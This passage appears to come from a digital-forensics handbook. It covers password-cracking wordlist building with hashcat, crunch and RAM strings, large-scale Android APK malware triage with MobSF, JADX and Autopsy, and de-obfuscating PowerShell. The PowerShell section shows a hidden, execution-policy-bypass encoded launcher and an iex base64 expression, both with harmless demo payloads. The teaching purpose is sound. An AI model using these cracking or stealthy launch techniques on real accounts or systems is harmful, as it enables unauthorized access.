Here¹¹⁰ is a partial list of HTML names and their ASCII equivalents.
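Python's standard library can also do this conversion for every named entity in one pass. A short sketch using html.unescape, which recognizes common entities even without the trailing semicolon (such as &gt):

import html

with open("WordList.txt", "r", encoding="utf-8", errors="ignore") as src, \
     open("WordList_clean.txt", "w", encoding="utf-8") as dst:
    for line in src:
        dst.write(html.unescape(line))  # e.g. "&gt;" or "&gt" back to ">"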
Finally, we may choose to select only potential passwords of a certain length. Grep can
be very useful here. The command grep -x -E '.{4,16}' WordList.txt >
AndroidPWLength.txt will select only lines that are between 4 and 16 characters in length (the -E
flag enables the extended regex syntax that the {4,16} repetition requires). The command
grep -x -E -v '[0-9]+' AndroidPWLength.txt > Alphanumeric.txt will then
exclude all PIN codes from the list and select only alphanumeric passwords. This final list should
be a deduplicated list of possible passwords from the AXIOM wordlist, Bulk Extractor, and foreign
language list that can be used against the Android device with the appropriate forensic tool.
Mangling Wordlists In Place
Perhaps the combined wordlist just mentioned still did not crack the stubborn password, and the
forensic tool being used does not allow rules on the fly the way Hashcat does. If this is the
case, the wordlist will need to be mangled in place before uploading it to the forensic
tool. Hashcat can still be used to do the mangling, but it
will need to be done using Linux. As was mentioned in the previous section, I prefer Kali Linux but
to each their own. The following instructions are how to mangle the wordlist in place using a Kali
Linux OS, but the location of the rule list may be different if using a different flavor of Linux.
Copy the wordlist to a Kali Linux computer and navigate to the folder that contains the wordlist
you want to mangle with the Hashcat rule of your choice. For this example, I will use Wordlist.txt
and the best64.rule rule. Open up a terminal window (if you are using the GUI instead of
the CLI to navigate) by right-clicking in the area inside of the folder and use the following
command: hashcat --force Wordlist.txt -r /usr/share/hashcat/rules/best64.rule --stdout
> Wordlist_best64.txt and hit enter. Once the iteration is complete, the file Wordlist_best64.txt
will be created and will contain all of the iterations of Wordlist.txt with the best64.rule rule used
against it so that a straight dictionary attack can be used. Keep in mind that this can quickly create
massive files even out of smaller wordlists, which is why I am using the much smaller rule set of
best64.rule rather than onerulestorulethemall.rule. If even the standard smaller rules create
wordlists that are too big to use on the forensic tool, then custom rules can be created. For example,
a file named append_exclamation.rule containing only two lines of : and $! (each on their own
line) would append an exclamation point to every word in a wordlist so it would double the size
of the list. More information on how to mangle wordlists using Hashcat can be found at this blog
post¹¹¹. It might also be useful to make sure that there are no duplicates by using rling against the
wordlist again. Additionally, if a max password length is known it would be good to use grep to
remove passwords that are too long as was mentioned in the previous section.
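To see what that two-line rule actually does to a list, here is the same transformation sketched in Python (the ":" rule passes each word through unchanged, and the "$!" rule appends an exclamation point):

with open("Wordlist.txt", "r", encoding="utf-8", errors="ignore") as src, \
     open("Wordlist_bang.txt", "w", encoding="utf-8") as dst:
    for line in src:
        word = line.rstrip("\n")
        dst.write(word + "\n")   # the ":" rule - the word as-is
        dst.write(word + "!\n")  # the "$!" rule - the word plus "!"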
¹¹⁰https://ascii.cl/htmlcodes.htm
¹¹¹https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/
Additional Resources and Advanced Techniques
Building Wordlists from RAM
While it is pretty much required to have the admin password from a computer to acquire RAM,
if RAM has been acquired on a system and there is a need to crack an additional password other
than the known admin password, RAM can be a great resource to build a custom wordlist for that
system. Once again, Linux is a useful tool for this. The basic process is to take an uncompressed
RAM capture and extract candidate passwords from it using the strings command. Linux can also
deduplicate these candidates. An example command would look
like strings Memory_file | sort | uniq > RAMwordlist.txt where 'Memory_file' is the name of
the uncompressed memory image. Then the generated wordlist can be used in Hashcat just like a
dictionary attack. For more info, check out a great video¹¹² on the topic by DFIRScience.
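The same extraction can be sketched in Python for cases where the strings binary is not handy. This version assumes candidate passwords are plain ASCII runs of six or more printable characters, and it reads the entire image into memory, so prefer the command-line pipeline above for large captures:

import re

with open("Memory_file", "rb") as ram:
    data = ram.read()
# Pull runs of 6+ printable ASCII characters as candidate passwords.
candidates = sorted(set(re.findall(rb"[ -~]{6,}", data)))
with open("RAMwordlist.txt", "wb") as out:
    out.write(b"\n".join(candidates) + b"\n")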
Crunch for Generating Random Wordlists
Crunch¹¹³ is a Kali Linux package that generates wordlists from a predefined set of characters at a
specific length. This can be useful if certain characters are known or if
the length of the password is known. It is a bit simpler than using rules in Hashcat, it is easy to
use, and it is quite useful for lists of only a few characters in length. It is similar to generating a
list for brute-forcing a password which has limitations already discussed, but it can be useful. From
the terminal window on a Linux machine simply type the command sudo apt install crunch to
install. The example on their home page shows the command crunch 6 6 0123456789abcdef -o
6chars.txt generating a list of all combinations and permutations of all digits and the letters a-f
and outputting the results to a file.
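For comparison, the equivalent of that crunch example in a few lines of Python using itertools.product, which writes out the same 16^6 (roughly 16.8 million) six-character candidates:

from itertools import product

charset = "0123456789abcdef"
with open("6chars.txt", "w") as out:
    for combo in product(charset, repeat=6):
        out.write("".join(combo) + "\n")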
Combinator Attacks and More by 13Cubed
The 13Cubed YouTube channel¹¹⁴ has excellent and in-depth information on numerous digital
forensics concepts. One of his videos covers how to concatenate words together to crack passwords
that may consist of several words strung together. He also goes over some more advanced topics
and concepts related to using Hashcat; check out the first of his two-part series on Hashcat¹¹⁵.
John the Ripper
John the Ripper is similar to Hashcat in many ways but where I think it really shines is for hash
extraction to start the process of cracking a password. John the Ripper can also be used instead
of Hashcat to crack the actual hash, and it can also mangle wordlists in a similar fashion to the
previously described method of using Hashcat on a Linux machine. More info on John the Ripper
can be found on their website¹¹⁶.
¹¹²https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience
¹¹³https://www.kali.org/tools/crunch/
¹¹⁴https://www.youtube.com/c/13cubed
¹¹⁵https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed
¹¹⁶https://www.openwall.com/john/
Conclusion
This has been just a brief dive into how easy it is to crack simple passwords, and hopefully it shows
why strong passwords are so important. The Windows operating system uses a weak hashing
algorithm for its passwords, which makes it a good place to start when trying to crack passwords for fun or
security testing purposes. Even with strong encryption methods, a weak or reused password will not
be sufficient to safeguard the data. Knowing these methods are out there to defeat user passwords
should show the user why it is so important to use strong passwords and why it is a bad idea to
reuse passwords between accounts. A better understanding of the attack methods against passwords
should encourage everyone to use better security practices to safeguard their data.
References
Cubrilovic, N. (2009, December 14). RockYou Hack: From Bad To Worse. Retrieved
May 12, 2022, from TechCrunch¹¹⁷
crunch | Kali Linux Tools. (2021, September 14). Retrieved July 1, 2022, from Kali Linux¹¹⁸
Fast password cracking - Hashcat wordlists from RAM. (2022, June 15). Retrieved June 22, 2022, from
YouTube¹¹⁹
Introduction to Hashcat. (2017, July 20). Retrieved June 22, 2022, from YouTube¹²⁰
John the Ripper password cracker. (n.d.). Retrieved June 22, 2022, from John the Ripper¹²¹
Harley (2020, November 16). Using Hashcat Rules to Create Custom Wordlists. Infinite Logins. Re-
trieved September 8, 2022, from https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-
custom-wordlists/
hashcat - advanced password recovery. (n.d.). Retrieved May 12, 2022, from Hashcat¹²²
Patton, B. (2022, March 25). NTLM authentication: What it is and why you should avoid using it.
Retrieved May 12, 2022, from The Quest Blog¹²³
Picolet, J. (2019). Hash Crack: Password Cracking Manual (v3). Independently published.
W34kp455. (2014). Weakpass. Retrieved May 12, 2022, from Weakpass¹²⁴
¹¹⁷https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/
¹¹⁸https://www.kali.org/tools/crunch/
¹¹⁹https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience
¹²⁰https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed
¹²¹https://www.openwall.com/john/
¹²²https://hashcat.net/hashcat/
¹²³https://blog.quest.com/ntlm-authentication-what-it-is-and-why-you-should-avoid-using-it/
¹²⁴https://weakpass.com/
Chapter 4 - Large Scale Android Application Analysis
By s3raph¹²⁵ | Website¹²⁶ | Discord¹²⁷
Overview
This chapter provides a cursory overview of Android application analysis through automated and
manual methods followed by a methodology of adjusting to scale.
Introduction
Mobile forensics, specifically as it pertains to Android devices, tends to focus a little more heavily
on application analysis during the initial evaluation. Unlike Windows systems, the sandbox nature
of the devices (assuming they aren’t and/or can’t be easily rooted), makes it a little more difficult to
gain a deeper forensic image without first compromising an existing application (such as malicious
webpages targeting exploits in Chrome or through hijacking an insecure update process in a given
application), utilizing a debugging or built-in administrative function, or through installing an
application with greater permissions (both methods would still require privilege escalation to root). A
typical stock Android phone has had anywhere from 60 to 100+ applications installed at any given time,
and more recent phones routinely ship with more than 100. This includes system applications maintained by
Google, device/manufacturer applications such as with Huawei or Samsung, and network provider
¹²⁵https://github.com/s3raph-x00/
¹²⁶https://www.s3raph.com/
¹²⁷http://discordapp.com/users/598660199062044687
applications such as with Sprint, Vodafone, or Verizon. Additionally, device manufacturers and
network providers typically have agreements with various companies, such as Facebook, to preinstall
their application during device provisioning. Most of these applications cannot be easily pulled
during forensic analysis without utilizing some method of physical extraction (i.e., use of Qualcomm
Debugger functionality) or root access.
Part 1 - Automated Analysis
If during a forensic analysis you are lucky enough to get all of the Android applications resident
on the system, you are left with the problem of analyzing 100+ applications. Most
Android application analysis tools are developed for automated analysis of individual
applications, with some ability to do a comparative analysis of two APKs. In this space, MobSF¹²⁸ is
considered one of the most popular application analysis tools. It provides automated analysis of
various APKs, with varying levels of success for both static and dynamic analysis. Installation is
fairly easy and the developer has fairly robust documentation.
Please refer to https://mobsf.github.io/docs/#/installation for the most up-to-date instructions.
The following installation instructions work at the moment:

sudo apt-get install git python3.8 openjdk-8-jdk python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdf
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
sudo ./setup.sh
If you plan on installing this on a VM, please note that dynamic analysis is not really
supported. If you were able to modify MobSF to run in a VM, there is a significant probability
of specific functionality failing to execute properly, and any results would not be consistent
or trustworthy. Personally, I use my own virtualized environment separate from MobSF,
which will potentially be discussed in another guide.
¹²⁸https://github.com/MobSF/Mobile-Security-Framework-MobSF
Once installed, you can run MobSF with the following simple command within the MobSF directory
<Mobile-Security-Framework-MobSF>.
./run.sh
Additionally, you can specify the listening address and listening port as MobSF starts its own web
server for user interaction. The following default setting will be used if the command is started
without arguments:
0.0.0.0:8000
Example post run:
Accessing the hosted webpage with your favorite browser shows the following webpage:
From here, you can upload the binary to the MobSF instance in your virtual machine:
After uploading, the webpage will often time out, so click Recent Scans, which shows the following:
Because we are in a VM, the dynamic report will be unavailable but the static report should provide
the primary details for initial triage of the application. After a few minutes and depending on the
size of the application, the report will be ready for analysis:
For malware analysis, there are a number of websites hosting samples for training and tool
development, but I have typically found vx-underground.org¹²⁹ to be fairly robust.
¹²⁹https://www.vx-underground.org/
The malware needs to be extracted with the password "infected" and renamed with the extension
.apk. The scan by MobSF showed the following details:
There are two options to view either a Static Report or Dynamic Report. Because we are in a virtual
machine, there will not be an available Dynamic report. The Static Report shows the following
information:
Outside of the calculated hashes, the actual information needed for an assessment is further down:
The section in the upper right shows that MobSF stored the decompiled Java code, which can be
compared to the results and referenced later. The section below shows that the signing certificate has an
unusual xuhang string in almost all of the issuer information. The next section of interest relates
to the requested permissions:
Permissions such as MOUNT_UNMOUNT_FILESYSTEMS for what appears to be a game look incredibly
unusual.
Other sections of interest include various API functions that could potentially indicate application
capabilities.
For example, clicking on com/g/bl.java shows the following code segment:
Generally speaking, the function to pass commands to /system/bin/sh should be scrutinized and
typically is indicative of malicious intent. This isn’t always the case as applications that provide
system functionality typically use sh as a means to use native Android OS tools such as ping.
Another area of concern is the collection and sending of sensitive device information, including the
IMSI and wireless MAC address:
While the functions and information accessed appear malicious, validating any suppositions with
actual evidence of malicious intent would be prudent. The additional analysis is beyond the scope
of this initial writeup but is typical of most malware analysis methodologies.
Part 2 - Manual Analysis
Now that we have done some initial analysis of an APK with an automated tool such as MobSF, let's
dive into some manual analysis using JADX¹³⁰. JADX is a decompiler that converts
compiled APKs and DEX files into readable decompiled code. The source code and compiled releases
for JADX provide both CLI- and GUI-based applications that run on Linux, macOS, and Windows.
After opening one of the APKs within JADX a breakdown of the stored decompiled code, resources,
and embedded files can be seen:
Whether malicious or not, most Android applications have some level of obfuscation. In this case,
the major programmatic functionality is not obfuscated but the names of the classes (a, b, c, etc.) do
not have significant meaning and can make initial analysis more difficult:
¹³⁰https://github.com/skylot/jadx
One area that should be checked is the APK signature and certificate details:
This matches what MobSF had reported. It is possible to get differing results from different tools so
double/triple checking relevant details is important.
Another area for analysis is the AndroidManifest.XML file stored within the Resources folder
structure:
Here we see the same significant number of permissions along with some third-party
application app keys which appear to be directly associated with the following GitHub repository:
https://github.com/angcyo/umeng. Interestingly, the following topic on Alibaba Cloud references
both the WRITE_EXTERNAL_STORAGE permission as required to dynamically update APKs
using UMENG and the associated APPKEY:
https://topic.alibabacloud.com/a/use-umeng-to-automatically-update-apk-and-umeng-apk_1_21_32538466.html.
If true, this obviously has the implication that even if no malicious logic is baked directly into
the application at the time of static and dynamic analysis, the application could be manipulated at any
later time. Going beyond this initial triage is out of scope for this write-up, but this portion of analysis
is important to highlight the need for manual analysis and for reading contextual clues. Any
automation should be validated and checked regardless of scaling.
While usually successful, it should be noted that JADX cannot always decompile the compiled code
to Java, and any errors should be reviewed to ensure that the code that failed to decompile does not
contain malicious logic. The following screenshot shows a typical decompilation error:
The concept of this writeup was to provide a cursory analysis of a piece of malware that would
provide the foundation of automating large scale analysis of APKs. The foundation begins at
minimum with some of the above techniques (permissions and signatures) but also on basic threat
hunting aspects such as searching for various exploitation techniques and indicators of compromise.
In that sense, hard coded references to /system/bin/sh, hard coded IP addresses, and unusual
permissions are fairly easy using the built-in search functionality:
I would recommend enabling searching within comments, as sometimes additional functionality
using external APIs and websites is simply commented out but otherwise accessible.
Problem of Scale
So far, we have covered the bare basics of using MobSF to analyze an APK as well as how to
manually interrogate the same APK using JADX. In most mobile malware forensic investigations
with physical access (not logical), stock Android phones have 100+ APKs (including
system applications, device manufacturer applications, network provider applications, and third-party
applications) that could need to be analyzed. Devices in active usage could reach beyond 200
APKs that potentially need analysis. 200+ APKs is a significant number of applications
for a malware forensic analysis but the investigation could be completed using MobSF and JADX in
a few weeks. The problem comes at scale, when the number of devices being analyzed expands. Now
you may have 100+ devices, each with 100+ APKs that may or may not be the same version. This
quickly becomes untenable, which results in a need to develop or adapt a mobile application analysis
methodology that scales.
Part 3 - Using Autopsy, JADX, and Python to Scrape and
Parse Android Applications at Scale
The last scenario isn’t a hypothetical one, it is one that I had to adjust and adapt methodology for.
To start with the forensic analysis, you need to have an Android image to work with. If you have
one saved from a test device using Cellebrite that can be used to test and develop the solution at
scale. If you don’t, you can simply pull a virtual machine from osboxes.org¹³¹. Keep in mind there
are significant differences between x86 and ARM architectures and Android versions so don’t be
hyper specific in file locations and file names.
Pro-Tip: Using an Android VM (either from osboxes.org or another source) along with a host-only
network adapter can allow you to capture and manipulate network traffic (including
some SSL-encrypted traffic) by using your brand of network collection (Security Onion¹³²
or simple Wireshark¹³³) and a MiTM proxy with SSLStrip (BetterCap¹³⁴). Combined with
a code injection tool with memory reading capabilities (Frida¹³⁵), this can be the foundation
of more advanced dynamic analysis methodologies.
Once you have the appropriate image file (vmdk, bin, img, etc.), you can create a new case within
Autopsy:
¹³¹https://www.osboxes.org/android-x86/
¹³²https://github.com/Security-Onion-Solutions/securityonion
¹³³https://gitlab.com/wireshark/wireshark
¹³⁴https://github.com/bettercap/bettercap
¹³⁵https://github.com/frida/frida
Select Disk Image or VM file as seen below:
Select the appropriate image file:
Select the appropriate Ingest Modules (you can leave this default for now; we will come back here).
Continue through the default options until the data source is ingested as seen below:
At this point we have the basic test and development case set up. Now it is time to start developing
a solution to the problem of scale. The first portion of the problem is to find a relatively simple
and automated solution to pull APK files from data sources. Autopsy has a specific capability
that allows you to use purpose-built Python plugins to automate such tasks. Using
public examples (such as https://github.com/markmckinnon/Autopsy-Plugins), I modified one of
the simpler Python scripts to search for and flag files with the .apk extension (amongst others):
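A complete Autopsy module has to implement the ingest module interfaces, so the sketch below is not a drop-in plugin. It only illustrates the core matching-and-pulling logic in plain Python, with EXPORT_DIR and PULL_DIR as placeholder paths standing in for the plugin's hardcoded pull location noted below:

import os
import shutil

EXPORT_DIR = r"C:\Cases\android_export"  # placeholder: files exported from the image
PULL_DIR = r"C:\Cases\pulled_apks"       # placeholder: hardcoded pull location

os.makedirs(PULL_DIR, exist_ok=True)
for root, _dirs, files in os.walk(EXPORT_DIR):
    for name in files:
        if name.lower().endswith(".apk"):  # flag by extension, as the plugin does
            shutil.copy2(os.path.join(root, name), os.path.join(PULL_DIR, name))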
Please Note: The script referenced above contains a hardcoded file location that the found
files are pulled to. This must be modified to match your system. Dynamically pulling the folder
location appeared too difficult at the time due to Autopsy using modified Python methods
that are cross-compiled into Java (things get weird). Additionally, the following wiki¹³⁶
hasn't really been updated, so a significant amount of testing is needed. To aid in your
troubleshooting, the log file can be accessed by going to the case folder:
¹³⁶http://www.sleuthkit.org/autopsy/docs/api-docs/4.9.0/
Going to the log folder:
Finally, opening one of the plain text log files:
Unfortunately, this file is locked while Autopsy is running and you must close Autopsy to view any
associated error.
Once a Python script has been developed and tested, you have to manually add in the Python plugin
to the appropriate folder. A simple link can be accessed from the menu option below:
To add the Python plugin, you simply move an appropriately named folder structure containing the
Python modules into the following directory:
Now simply restart Autopsy and right click the data source you wish to run the plugin against:
Similar to before, if all is well a new option should be present:
Now simply click Deselect All (since the other modules have already run) and click your custom tool. If you are
using a barebones osboxes VM, it would be prudent to add some various APKs first. Once the module
finishes running you should see the following:
So now we have a way to automate the scraping of APK files; to continue, we need to do some
rudimentary analysis. Remember how JADX had a CLI? This functionality can help decompile the
APKs fairly quickly, allowing for additional analysis using REGEX, individual file hashing, and other
forensicating things. For this situation, I developed a companion Python script (YAAAAT_apk_ripper,
part of Yet Another Android Application Tool¹³⁷) that embeds the functionality required
for my use case:
The following code section shows the functionality of running JADX and dumping the output to the
case_extract folder:
¹³⁷https://github.com/s3raph-x00/YAAAAT
This script works by iteratively going through the case_extract/apk folder structure and attempts
to be fairly fault tolerant in the case of incorrect file extensions or file corruption.
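The batch-decompilation loop at the heart of such a script can be sketched in a few lines. This version assumes jadx is on the PATH and mirrors the case_extract folder layout described above:

import subprocess
from pathlib import Path

apk_dir = Path("case_extract/apk")
out_dir = Path("case_extract/decompiled")

for apk in apk_dir.glob("*.apk"):
    try:
        subprocess.run(["jadx", "-d", str(out_dir / apk.stem), str(apk)],
                       check=True, timeout=600)
    except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as err:
        # Stay fault tolerant: log the failure and move on to the next APK.
        print(f"[!] {apk.name}: {err}")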
Beyond the simple JADX decompiling functionality, additional functions can be added by analyzing
the code sections of the decompiled APK using REGEX:
The above code section attempts to find high-confidence URLs within the code base and extract that
information to a mapped log file for manual analysis. There are other regex solutions for mapping out
potential URLs, which helps mitigate missing URLs that are crafted in pieces.
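A sketch of that kind of sweep is below; the pattern is a deliberately strict assumption, and looser patterns will catch more URL fragments at the cost of more noise:

import re
from pathlib import Path

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>]*)?")

with open("url_map.log", "w", encoding="utf-8") as log:
    for src in Path("case_extract/decompiled").rglob("*.java"):
        text = src.read_text(encoding="utf-8", errors="ignore")
        for url in URL_RE.findall(text):
            log.write(f"{src}\t{url}\n")  # map each hit back to its source file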
Besides JADX, to parse embedded certificates (for APK signature analysis and potential certificate
pinning implementations), the script incorporates the Java keytool if a Java JDK is present and some
methods using OpenSSL if not:
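The keytool path of that logic can be sketched with a simple subprocess loop; keytool -printcert -jarfile reads the signing certificate straight out of an APK (this assumes a JDK keytool on the PATH, and the folder layout is the same placeholder used earlier):

import subprocess
from pathlib import Path

for apk in Path("case_extract/apk").glob("*.apk"):
    result = subprocess.run(["keytool", "-printcert", "-jarfile", str(apk)],
                            capture_output=True, text=True)
    with open(f"{apk}.cert.txt", "w", encoding="utf-8") as out:
        out.write(result.stdout or result.stderr)  # keep errors for later triage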
The methods aren’t perfect by any means, and more testing across a number of different certificate
implementations is needed. Despite this, it is similar to the automated single-APK analysis using MobSF
and manual analysis with JADX, but it also allows for larger-scale analysis of APK signatures.
This script is far from perfect or complete, but it foundationally provided the basic methodology to
extract the specific information desired for large-scale analysis. Splunk becomes useful in
this context, as the data contained in the text files can be ingested and parsed, allowing for larger-scale
analysis in areas such as granular file changes in the embedded APKs, the addition of URLs and IP
addresses, and other anomalies. This write-up does not go into extensive detail about every specific
use case, but hopefully, given enough time, effort, and data, you can scale the application analysis
methodology to suit your needs. Regardless of the implementation, Android APIs and APKs change
frequently, so be sure to retest solutions and manually spot-check results to ensure they still
fit the goal of the solution.
Chapter 5 - De-Obfuscating PowerShell Payloads
By Tristram¹³⁸ | Twitter¹³⁹ | Discord¹⁴⁰
Introduction
I have had the pleasure of working with many individuals within the cyber security field, belonging
to both the blue and red teams.
Regardless of which side you prefer to operate on, whether you’re a penetration tester looking to
put an organization’s security program to the test or a blue teamer looking to stomp on adversaries
during every step of their desired campaign, we are ultimately on the same side. We are advisors to
risk and we offer guidance on how to eliminate that risk; the difference is being how we respond.
We are ultimately on the same team, operating as one entity to ensure the security and integrity
of the organizations we serve and the data that they protect. Part of how we work towards this
common goal is through professional development and imparting our knowledge to others. Projects
such as this are an example of why our security community is strong. We care, we learn, we grow.
Together, there is nothing that will stop us from being successful.
As an individual who is primarily a blue teamer with roots in penetration testing, I am looking to
impart unto you some of the common scenarios that I have faced that I feel would help provide you
the foundation and confidence you’re looking for to comfortably break down obfuscated PowerShell
payloads.
¹³⁸https://github.com/gh0x0st
¹³⁹https://twitter.com/jdtristram
¹⁴⁰http://discordapp.com/users/789232435874496562
What Are We Dealing With?
PowerShell is a powerful scripting language that has eased the process of managing Windows
systems. These management capabilities have evolved over the years as PowerShell has expanded from
its exclusive Windows roots and has become accessible on other systems such as macOS and Linux.
Despite the technological advances this solution has provided system administrators over the years,
it has also provided penetration testers and cyber criminals similar opportunities to be successful.
This success resonates with proof-of-concept exploit code for major vulnerabilities such as what
we saw with PrintNightmare / CVE-2021-34527
(https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527).
One of the hurdles people will find when they use PowerShell for these types of activities is that the
code will ultimately be accessible in plain text. While this is helpful for security researchers to learn
from others and their published exploit code, it’s equally as helpful for security providers to reverse
engineer and signature these payloads to prevent them from doing harm.
For blue teamers, this is a good thing, however for penetration testers, as well as cyber criminals,
this will directly impact their success. In an effort to obstruct the progress of security providers
from being able to easily signature their payloads, they will introduce various levels of obfuscation
to help hide their code in plain sight. While this helps the red teamers, it unfortunately makes our
job as blue teamers a bit more difficult. However, with a little bit of exposure to common obfuscation
techniques and how they work, you will find that deobfuscating them is well within your grasp.
Through this chapter, I am looking to expose you to the following obfuscation techniques and how
you can de-obfuscate them.
1. Base64 Encoded Commands
2. Base64 Inline Expressions
3. GZip Compression
4. Invoke Operator
5. String Reversing
6. Replace Chaining
7. ASCII Translation
Stigma of Obfuscation
Obfuscation, in essence, is a puzzle of sorts, and with every puzzle, all you need is time. It's
important to understand that obfuscation is not a be-all and end-all solution to preventing payloads
from being signatured. If you continue to use the same obfuscated payload or obfuscation technique,
it will eventually get busted.
This reality can cause debates in the security community on its overall effectiveness, but it's
important for us to understand that obfuscation serves two purposes for red teams:

1. Bypass various signature-based detections from anti-virus solutions as well as AMSI;
2. To buy time in the event the payload is successful, but later discovered by a blue team.

Bypassing security solutions is a trivial process, but where the gap typically exists is
with the second item, when we are responding to incidents involving these payloads.
Let’s put this into perspective with a commonly experienced scenario:
Assume we are a penetration tester and we are performing an assessment against an organization.
We managed to obtain a list of valid email addresses and decided to try to launch a phishing
campaign. With this phishing campaign, we emailed the staff a Word document containing a
macro that launches a remotely hosted PowerShell script containing a reverse shell, and neither the
document nor the script is flagged by any known anti-virus.
At some point the user reports the email and we launch our phishing assessment procedures and
identify that the user did in fact open the email and got pwned.
From the firewall logs we are able to see where they connected to and were able to plug the hole.
Continuing our incident response procedures, we follow up on the embedded payload to ensure that
it doesn't include any other logic we don't already know about, such as a mechanism giving it
more than one remote address to reach out to in the event one gets discovered.
As the penetration tester, we coded contingencies for this very scenario so that our payload does
in fact use more than one remote address. To ensure our extra effort doesn't get steamrolled, we
obfuscated our payload so the blue team would have to spend extra time lifting the veil, buying us
more time to hopefully move laterally through the network, away from the point of entry.
This is the barrier that must be overcome within a reasonable amount of time so that we can
ensure the threat we have evicted from our network stays evicted. As a blue teamer, if you're
exposed to a complicated or unfamiliar obfuscation technique, then chances are you may move on to
something else or spend too much time trying to uncover its secrets.
To help overcome this obstacle, we will step through various obfuscation techniques, including how
they’re generated and how you can deobfuscate them.
Word of Caution
It goes without saying that when dealing with PowerShell payloads that are malicious or otherwise
suspicious, you should avoid trying to dissect these payloads on your production machine. No
one wants to be responsible for a breach or get compromised themselves because they accidentally
executed a piece of code that they did not understand.
A good practice is to always have a sandbox solution on standby. You can use a local sandbox, such
as a virtual machine, that has no connected network adapters, or that is at least configured on an
entirely separate internet connection with no sensitive assets on the network.
In addition to this, being sure you have enough storage for snapshots is very useful. This way if you
accidentally compromise your sandbox, or want to get it back to a known-working state, then you
can simply revert it and continue where you left off.
Base64 Encoded Commands
One of the first methods of obfuscating PowerShell payloads utilized a feature of the
powershell.exe executable itself. Specifically, this executable supports the -EncodedCommand
parameter, which accepts a base64-encoded string. Once called, PowerShell decodes the string and
executes the code therein.
While this is trivial to decode, the method was enhanced with additional optional parameters.
These optional parameters can also be called using partial names, so long as they’re unambiguous,
which is a common practice with this particular launcher. This is arguably the most popular approach
and is also one of the easiest to discover when reviewing logs.
Let’s take a look at the following payload of this technique and break it down.
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
At a quick glance, we can clearly see that powershell.exe is being called directly with five parameters
passed using partial names. We can consult the help file for these by running powershell -help.
Let’s break down the parameters:
Partial Parameter   Full Parameter            Description
-NoP                -NoProfile                Does not load the Windows PowerShell profile.
-NonI               -NonInteractive           Does not present an interactive prompt to the user.
-W Hidden           -WindowStyle Hidden       Sets the window style to Normal, Minimized, Maximized, or Hidden.
-Exec Bypass        -ExecutionPolicy Bypass   Sets the default execution policy for the current session.
-Enc                -EncodedCommand           Accepts a base64-encoded string version of a command.
With our newfound understanding of the parameters in play, we can now break down exactly what’s
happening when this gets called: the session will launch unrestricted, as a hidden window.
Now that we understand the behavior of the PowerShell process when executed, our next step is to
identify the encoded payload that’s being executed behind the scenes. Decoding base64 is a trivial
process, and we can use PowerShell itself to decode the string.
Keep in mind that running this method will not execute any underlying code by itself.
PS C:\> $Bytes = [Convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA')
PS C:\> $Command = [System.Text.Encoding]::Unicode.GetString($Bytes)
PS C:\> Write-Output "[*] Decoded Command >> $Command"
[*] Decoded Command >> Write-Output "Obfuscated Payload"
Running this method has revealed a simple payload, which was expected based on the size of the
base64-encoded string; if the string were significantly larger, we could safely assume the payload
would be larger as well.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
PS C:\> $Command = 'Write-Output "Obfuscated Payload"'
PS C:\> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
PS C:\> $Base64 = [Convert]::ToBase64String($Bytes)
PS C:\> Write-Output "[*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc '$Base64'"
[*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
Base64 Inline Expressions
This method is very similar to the previous technique, except that instead of passing base64-encoded
strings to the powershell.exe executable, we can embed them directly into our scripts themselves.
Let’s see an example of this in action.
PS C:\> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'))))
The majority of obfuscation techniques for PowerShell payloads are simply different string
manipulation techniques. In the grand scheme of things, strings are not a risk or executable on their
own; they rely on a launcher to take the string and treat it as executable code.
In the above sample, observe the three-letter command iex, which is an alias for the
Invoke-Expression cmdlet. The Invoke-Expression cmdlet accepts a string which is then executed as
a command.
To put this into perspective, we will create a variable called $String that stores the value
'Get-Service'. If we pass this variable to Invoke-Expression, we will see a list of
services output to the console as if we had simply run Get-Service.
PS C:\> $String = 'Get-Service'
PS C:\> Invoke-Expression $String

Status  Name            DisplayName
------  ----            -----------
Stopped AarSvc_b0e91cc  Agent Activation Runtime_b0e91cc
Stopped AJRouter        AllJoyn Router Service
Stopped ALG             Application Layer Gateway Service
…SNIP…
Returning to our obfuscated sample, we know that the payload is essentially built from two
components:
1. The launcher (iex)
2. The base64 decoder (string / command)
Once the base64 decoder runs, it will return a string. By passing this as an argument to iex, it will
essentially execute the resulting string from the base64 decoder. We can omit the iex, and simply
execute the decoder to reveal the underlying string.
PS C:\> ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'))))
Write-Output "Obfuscated Payload"
